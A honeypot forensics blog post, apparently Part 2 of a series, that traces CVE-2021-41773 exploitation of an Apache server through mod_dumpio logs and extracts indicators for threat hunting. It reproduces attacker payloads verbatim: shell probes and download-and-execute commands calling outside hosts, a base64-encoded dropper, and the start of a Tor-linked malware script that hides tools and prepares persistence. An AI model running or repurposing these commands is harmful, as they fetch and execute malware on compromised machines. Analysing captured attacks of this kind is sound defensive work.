[Sun Nov 28 20:36:50.047761 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v bash 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 20:39:29.171795 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Sun Nov 28 23:37:29.866905 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'94.130.181.216',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl);if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:01:19.183357 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a='00000000';if [ "$(command -v curl 2> /dev/null)" ]; then echo 'curl';a=$(timeout 5 curl -s http://94.130.181.216/test.txt 2> /dev/null); else if [ "$(command -v wget 2> /dev/null)" ]; then echo 'wget';a=$(timeout 5 wget http://94.130.181.216/test.txt -qO- 2> /dev/null); else if [ "$(command -v perl 2> /dev/null)" ]; then echo 'perl';a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'94.130.181.216',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl); else echo 'No cmd'; fi; fi; fi; if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:03:13.009116 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:33:58.483898 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:35:08.854471 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" -a ! "$(command -v ssh 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 00:36:01.589083 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ping 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 14:27:06.966555 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v printf 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Mon Nov 29 23:57:31.374578 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;a='00000000';if [ "$(command -v curl 2> /dev/null)" ]; then echo 'curl';a=$(timeout 5 curl -s http://49.12.205.171/test.txt 2> /dev/null); else if [ "$(command -v wget 2> /dev/null)" ]; then echo 'wget';a=$(timeout 5 wget http://49.12.205.171/test.txt -qO- 2> /dev/null); else if [ "$(command -v perl 2> /dev/null)" ]; then echo 'perl';a=$(echo "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr=>'49.12.205.171',PeerPort =>'80',Proto => 'tcp');die \\"Could not create socket: \\$!\\\\n\\" unless \\$sock;print \\$sock \\"GET /test.txt HTTP/1.0\\\\r\\\\n\\\\r\\\\n\\";my \\$a=0;while( \\$line = <\\$sock>) { print \\$line if(\\$a > 0); \\$a = 1 if(\\$line eq \\"\\\\r\\\\n\\");} close(\\$sock);" | timeout 5 perl); else echo 'No cmd'; fi; fi; fi; if [ ! "$a" -eq "11223344" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 12:59:49.905673 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:00:39.022332 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v ps 2> /dev/null)" -a ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:02:54.018345 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:03:57.133784 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v wget 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:04:28.236658 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v curl 2> /dev/null)" -a ! "$(command -v perl 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:05:51.286147 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; if [ ! "$(command -v scp 2> /dev/null)" ]; then echo 'False'; else echo 'True'; fi;echo vulnable
[Tue Nov 30 13:32:15.602743 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; uname -m;echo vulnable
[Tue Nov 30 14:35:40.549398 2021]  A=|echo;echo vulnable
[Tue Nov 30 14:56:27.461472 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin; uname -m;echo vulnable
[Tue Nov 30 15:54:28.092976 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; echo vulnable
[Tue Nov 30 15:54:56.728753 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; uname -m;echo vulnable
[Wed Dec 01 13:43:26.701088 2021]  A=|echo;PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin;  psfunc() { if [ "$(command -v ps 2> /dev/null)" ]; then ps x -o command -w 2> /dev/null | grep -v -a grep | grep -a "$1" 2> /dev/null;  else if [ "$(command -v pgrep 2> /dev/null)" ]; then pgrep -f -a -l "$1" 2> /dev/null | grep -v -a grep 2> /dev/null;  else if [ "$(cd /proc 2> /dev/null && ls | wc -l)" -gt "0" 2> /dev/null ]; then pids=$(cd /proc && ls | grep '[0-9]'); for pid in $pids; do printf %b $(cat /proc/$pid/cmdline 2> /dev/null | tr '\\000' ' ' | grep -v -a grep | grep -a "$1" 2> /dev/null); done;  else printf %b "0\\n";  fi;  fi;  fi;  };  netfunc() { cmd=""; ret=1;  if [ "$(command -v timeout 2> /dev/null)" ]; then cmd="timeout $3";  fi;  if [ "$(command -v curl 2> /dev/null)" ]; then cmd="$cmd curl --connect-timeout $3 -s $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --interface $4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v wget 2> /dev/null)" ]; then cmd="$cmd wget --connect-timeout=$3 -qO- $1:$2";  if [ ! -z $4 ]; then cmd="$cmd --bind-address=$4";  fi;  ret=$($cmd > /dev/null 2>&1; echo $?); else if [ "$(command -v perl 2> /dev/null)" ]; then bind=""; cmd="$cmd perl";  if [ ! -z $4 ]; then bind=", LocalAddr=> '$4'";  fi;  ret=$(printf %s "use IO::Socket;my \\$sock = new IO::Socket::INET(PeerAddr => '$1', PeerPort => '$2', Proto => 'tcp' $bind);die \\"Err\\\\n\\" unless \\$sock;close(\\$sock);" | $cmd > /dev/null 2>&1; echo $?); fi;  fi;  fi;  if [ "$ret" -eq "0" 2> /dev/null ]; then printf %b "$cmd\\n";  fi;  };  if [ ! "$(psfunc '.src.sh' 2> /dev/null)" ]; then echo 'Ready';  else echo 'Already install Running';  fi; uname -m;echo vulnable

Some of this code is recognizably repurposed from the Nov 14 encoded scripts. There are references to hxxp://94.130.181.216/test.txt and hxxp://49.12.205.171/test.txt, both of which currently return “11223344”. Both IPs are also owned by Hetzner, which has hosted every other URL we’ve seen so far.

Wrapping Up

That was quite the twisty maze of shell code, but at the end of the analysis we have a good idea of how the suspicious processes were launched and what “.src.sh” contains. We also have multiple still-active URL paths worth monitoring for, including hxxp://rr.blueheaven.live/1010/ and hxxp://116.203.212.184/1010/. Keep an eye out as well for the “.log/1010*/.spoollog” path showing up in temp directories and as the process CWD for new processes on your systems.
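If you want to turn that last indicator into a quick hunt, something along these lines will do (a sketch; GNU userland assumed):

# look for the dropper's working directory among running processes
ls -l /proc/[0-9]*/cwd 2>/dev/null | grep '\.log/1010'

# and look for leftover .spoollog paths on disk
find /tmp /var/tmp -path '*/.log/1010*' -name '.spoollog' 2>/dev/null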

Hudak’s Honeypot (Part 2)

This is Part 2 in a series. Part 1 is here.

During my triage I noticed a suspicious file /var/tmp/dk86. It’s a 64-bit Linux ELF executable, owned by user “daemon” and created 2021-11-11 19:09:51 UTC. Its MD5 checksum is d9f82dbf8733f15f97fb352467c9ab21, and searching for that hash on VirusTotal indicates this is a Tsunami botnet agent. Strings in the binary include the Japanese phrase “nandemo shiranai wa yo, shitteru koto dake” (roughly, “I don’t know anything, only the things I know”).
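Basic triage of the file is straightforward (a sketch of the obvious first commands; note that stat only shows a birth time on filesystems and kernels that record one):

file /var/tmp/dk86
md5sum /var/tmp/dk86
stat /var/tmp/dk86
strings -a /var/tmp/dk86 | less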

Since the file is owned by the same “daemon” user the system’s web server runs as, it’s reasonable to assume the file was created via the CVE-2021-41773 vulnerability the honeypot was set up to study. So I went to the web logs under /var/log/apache2 to try to find a web request matching the timestamp on the file. There’s an exact timestamp match on an entry from IP address 141.135.85.36.

141.135.85.36 - - [11/Nov/2021:19:09:51 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 - "-" "-"

There are a total of 132 logged requests from this IP on November 11 and 12. While most requests have a null user agent, two are tagged as coming from “zgrab/0.x” (part of the ZMap Project).

141.135.85.36 - - [11/Nov/2021:19:21:30 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"
141.135.85.36 - - [11/Nov/2021:19:32:04 +0000] "GET / HTTP/1.1" 200 45 "-" "Mozilla/5.0 zgrab/0.x"
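None of this requires fancy tooling. One-liners along these lines (the exact access log file names are an assumption) find the timestamp match and do the counting:

# the request matching the file creation timestamp
grep -h '11/Nov/2021:19:09:51' /var/log/apache2/access*.log

# total requests from the suspect IP, and the user agents they presented
grep -h '141.135.85.36' /var/log/apache2/access*.log | wc -l
grep -h '141.135.85.36' /var/log/apache2/access*.log | awk -F'"' '{print $6}' | sort | uniq -c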

A WHOIS search on the IP address comes back to a residential IP block owned by Telenet in Belgium.

All of the requests are POST requests. In a normal investigation that would be the end of the story, because POST request data is normally not logged. Happily, Tyler enabled mod_dumpio in the web server, which captures all the data between browser and server in the Apache error_log. There’s a lot of noise, so I used a little command-line kung fu to reduce the amount of data; some of the more interesting excerpts are shown below.

# grep 141.135.85.36 error_log | egrep -v '[0-9]* (read)?bytes' | fgrep -v '\r\n' | sed 's/\[dumpio.*data-HEAP)://; s/\[pid .* AH[0-9]*://'
[... snip ...]
[Thu Nov 11 19:09:14.268592 2021]  echo; ls /tmp;
[Thu Nov 11 19:09:14.478663 2021]  echo; pwd
[Thu Nov 11 19:09:14.696024 2021]  echo; whoami
[Thu Nov 11 19:09:14.910345 2021]  echo; hostname
[Thu Nov 11 19:09:29.415116 2021]  echo; wget -O /tmp/dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86;
[... snip ...]
[Thu Nov 11 19:09:29.700476 2021] [cgi:error]  2021-11-11 19:09:29 (346 KB/s) - '/tmp/dk86' saved [48748/48748]: /bin/bash
[... snip ...]
[Thu Nov 11 19:09:29.910929 2021]  echo; pwd
[Thu Nov 11 19:09:30.128200 2021]  echo; whoami
[Thu Nov 11 19:09:30.348177 2021]  echo; hostname
[Thu Nov 11 19:09:32.047781 2021]  P
[Thu Nov 11 19:09:32.053130 2021]  echo; ls /tmp;
[Thu Nov 11 19:09:32.403631 2021]  echo; pwd
[Thu Nov 11 19:09:32.619051 2021]  echo; whoami
[Thu Nov 11 19:09:32.835332 2021]  echo; hostname
[Thu Nov 11 19:09:46.456875 2021]  echo; chmod +x /tmp/dk86;
[Thu Nov 11 19:09:46.680203 2021]  echo; pwd
[Thu Nov 11 19:09:46.895844 2021]  echo; whoami
[Thu Nov 11 19:09:47.117973 2021]  echo; hostname
[Thu Nov 11 19:09:51.416009 2021]  P
[Thu Nov 11 19:09:51.419657 2021]  echo; /tmp/dk86;
[Thu Nov 11 19:09:51.467033 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.468329 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.481268 2021] [cgi:error]  no crontab for daemon: /bin/bash
[Thu Nov 11 19:09:51.481589 2021] [cgi:error]  no crontab for daemon: /bin/bash
[... snip ...]
[Thu Nov 11 19:32:20.965680 2021]  echo; id
[Thu Nov 11 19:33:05.094087 2021]  echo; id
[Thu Nov 11 19:34:03.356167 2021]  echo; id
[Thu Nov 11 19:35:40.387396 2021]  echo; id
[Thu Nov 11 19:39:36.040592 2021]  echo; id
[Thu Nov 11 19:49:54.240192 2021]  echo; curl http://103.116.168.68/apache80

Unfortunately, at the time of this writing neither of the URLs shown above is responding. However, if you do a Google search for the 138.197.206.223 URL, there is a great deal of intel about this site, including this link.

In any event, we can get a decent idea of the sequence of events by looking at the mod_dumpio output. At 19:09:29, /tmp/dk86 gets dropped. The file is made executable at 19:09:46 and executed at 19:09:51, which is the exact creation timestamp on /var/tmp/dk86, so we assume the running /tmp/dk86 created that copy. The error output also indicates that /tmp/dk86 is trying to interact with the crontab for user “daemon”. However, we find no cron entries for this user in the system image.

/tmp/dk86 has been removed. There’s been so much churn in /tmp that I doubt this file is recoverable. But I might go looking for it in the future. If I find anything, I’ll write that up in a separate blog post.
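If I do go digging, The Sleuth Kit is the obvious starting point. A minimal sketch, assuming a raw image of the honeypot disk (the image name and inode number below are placeholders):

# recursively list deleted directory entries in the image
fls -rd honeypot.dd

# recover the contents of a candidate inode, then verify against the known hash
icat honeypot.dd 123456 > dk86.recovered
md5sum dk86.recovered     # compare to d9f82dbf8733f15f97fb352467c9ab21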

There’s another interesting set of commands in the mod_dumpio output from Nov 12:

[Fri Nov 12 09:10:08.135090 2021]  echo; id
[Fri Nov 12 09:13:37.621551 2021]  echo; id
[Fri Nov 12 09:13:39.252263 2021]  echo; curl http://172.93.50.138/d | sh
[... snip ...]
[Fri Nov 12 09:13:39.369510 2021] [cgi:error]  dk86: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.371785 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.371845 2021] [cgi:error]  cannot access 'dk86': /bin/bash
[Fri Nov 12 09:13:39.371900 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.371918 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.377158 2021] [cgi:error]  dk32: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.379557 2021] [cgi:error]  sh: 1: : /bin/bash
[Fri Nov 12 09:13:39.379605 2021] [cgi:error]  ./dk86: not found: /bin/bash
[Fri Nov 12 09:13:39.379620 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.381071 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.381121 2021] [cgi:error]  cannot access 'dk32': /bin/bash
[Fri Nov 12 09:13:39.381167 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.381182 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.383487 2021] [cgi:error]  sh: 2: : /bin/bash
[Fri Nov 12 09:13:39.383625 2021] [cgi:error]  ./dk32: not found: /bin/bash
[Fri Nov 12 09:13:39.383641 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.387727 2021] [cgi:error]  dk86: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.388725 2021] [cgi:error]  chmod: : /bin/bash
[Fri Nov 12 09:13:39.388765 2021] [cgi:error]  cannot access 'dk86': /bin/bash
[Fri Nov 12 09:13:39.388802 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:39.388814 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:39.389853 2021] [cgi:error]  sh: 1: : /bin/bash
[Fri Nov 12 09:13:39.389980 2021] [cgi:error]  ./dk86: not found: /bin/bash
[... snip ...]
[Fri Nov 12 09:13:39.482184 2021] [cgi:error]  bash: line 39: $(pwd)/.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.486157 2021] [cgi:error]  bash: line 41: /usr/local/bin/.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:39.487927 2021] [cgi:error]  bash: line 42: /.SgII: Permission denied: /bin/bash
[Fri Nov 12 09:13:40.674001 2021] [cgi:error]  grep: : /bin/bash
[Fri Nov 12 09:13:40.674091 2021] [cgi:error]  /.ssh/authorized_keys: /bin/bash
[Fri Nov 12 09:13:40.674141 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.674156 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:40.675165 2021] [cgi:error]  bash: line 252: /.ssh/authorized_keys: No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.676620 2021] [cgi:error]  bash: line 252: [: -gt: unary operator expected: /bin/bash
[Fri Nov 12 09:13:40.679150 2021] [cgi:error]  grep: : /bin/bash
[Fri Nov 12 09:13:40.679194 2021] [cgi:error]  /.ssh/authorized_keys: /bin/bash
[Fri Nov 12 09:13:40.679232 2021] [cgi:error]  : No such file or directory: /bin/bash
[Fri Nov 12 09:13:40.679244 2021] [cgi:error]  : /bin/bash
[Fri Nov 12 09:13:40.680151 2021] [cgi:error]  bash: line 254: /.ssh/authorized_keys: No such file or directory: /bin/bash
[Fri Nov 12 09:13:51.131698 2021]  echo; id
[Fri Nov 12 09:13:52.076968 2021]  echo; pwd
[Fri Nov 12 09:13:52.294907 2021]  echo; whoami
[Fri Nov 12 09:13:52.516101 2021]  echo; hostname
[Fri Nov 12 09:13:54.127156 2021]  P
[Fri Nov 12 09:13:54.132660 2021]  echo; crontab -l;
[Fri Nov 12 09:13:54.346927 2021]  echo; pwd
[Fri Nov 12 09:13:54.566587 2021]  echo; whoami
[Fri Nov 12 09:13:54.784133 2021]  echo; hostname

The 172.93.50.138 URL is responsive and returns the following:

wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &

echo "d2dldCAtTyBkazg2IGh0dHA6Ly8xMzguMTk3LjIwNi4yMjM6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9kazg2OyBjaG1vZCAreCBkazg2OyAuL2RrODYgJg==" | base64 -d | sh
echo "Y3VybCBodHRwOi8vMTU5Ljg5LjE4Mi4xMTcvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2V2ZW50ZWVuL2xkbSB8IGJhc2g=" | base64 -d | sh

And here it is without the base64 encoding:

wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &
wget -O dk32 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk32; chmod +x dk32; ./dk32 &

echo 'wget -O dk86 http://138.197.206.223:80/wp-content/themes/twentysixteen/dk86; chmod +x dk86; ./dk86 &' | sh
echo 'curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm | bash' | sh
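You can verify the decoding yourself; base64 -d is all it takes (shown for the first encoded line, minus the trailing | sh, obviously):

echo 'd2dldCAtTyBkazg2IGh0dHA6Ly8xMzguMTk3LjIwNi4yMjM6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9kazg2OyBjaG1vZCAreCBkazg2OyAuL2RrODYgJg==' | base64 -d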

As I noted above, the 138.197.206.223 URL is non-responsive. But I got a very interesting script back from hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm, which I’m reproducing at the end of this blog post. The script really needs root privileges to be effective, and those were never achieved during this compromise. However, you can read through it and extract plenty of interesting items for your threat intel teams, including a .onion URL, plus an embedded SSH public key that the script tries to add to /root/.ssh/authorized_keys. There’s also some attempted manipulation of /etc/ld.so.preload, which is indicative of an LD_PRELOAD-type rootkit like the ones Craig Rowland has been blogging about.
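A couple of cheap checks for these specific indicators (a sketch; adjust paths for your environment):

# /etc/ld.so.preload should normally be absent or empty; any entry deserves scrutiny
cat /etc/ld.so.preload 2>/dev/null

# hunt for the script's embedded public key in any authorized_keys file
grep -r 'AAAAB3NzaC1yc2EAAAABJQAAAQBtGZHLQlMLkrONMAChDVPZf' /root/.ssh /home/*/.ssh 2>/dev/null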

Ultimately our dk86 compromise never really got going due to lack of privileges. But that doesn’t mean we can’t extract plenty of useful indicators for spotting future compromise attempts. In upcoming blog posts I will be digging into other compromises on the honeypot that actually achieved their goals. Stay tuned!

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="sgzhooqkd2i3d4z4v7pjhlj2ddbpqoda4v4lcrciblj7nvccepajufad"

TOR1=".tor2web.su/"
TOR2=".onion.ly/"
TOR3=".onion.ws/"
RPATH1='src/ldm'

TIMEOUT="75"
CTIMEOUT="22"
COPTS="-fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT}"
WOPTS="--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT}"

C1=""
C2=""

sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout -k 5 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
fi

if [ $(rm --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rm"; elif [ $(rrn --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then rm="rrn"; else rm="echo"; for f in /bin/*; do strings $f 2>/dev/null|grep -qi " rm does not remove dir" && rm="$f" && ${sudo} mv -f $rm /bin/rrn && break; done; fi
if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; done; fi
if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; done; fi

if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ] && [ -f "$0" ]; then
    ${sudo} chmod +x "$0"
    nohup ${sudo} "$0" -n >/dev/null 2>&1 &
    echo 'Sent!'
    exit $?
fi

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1

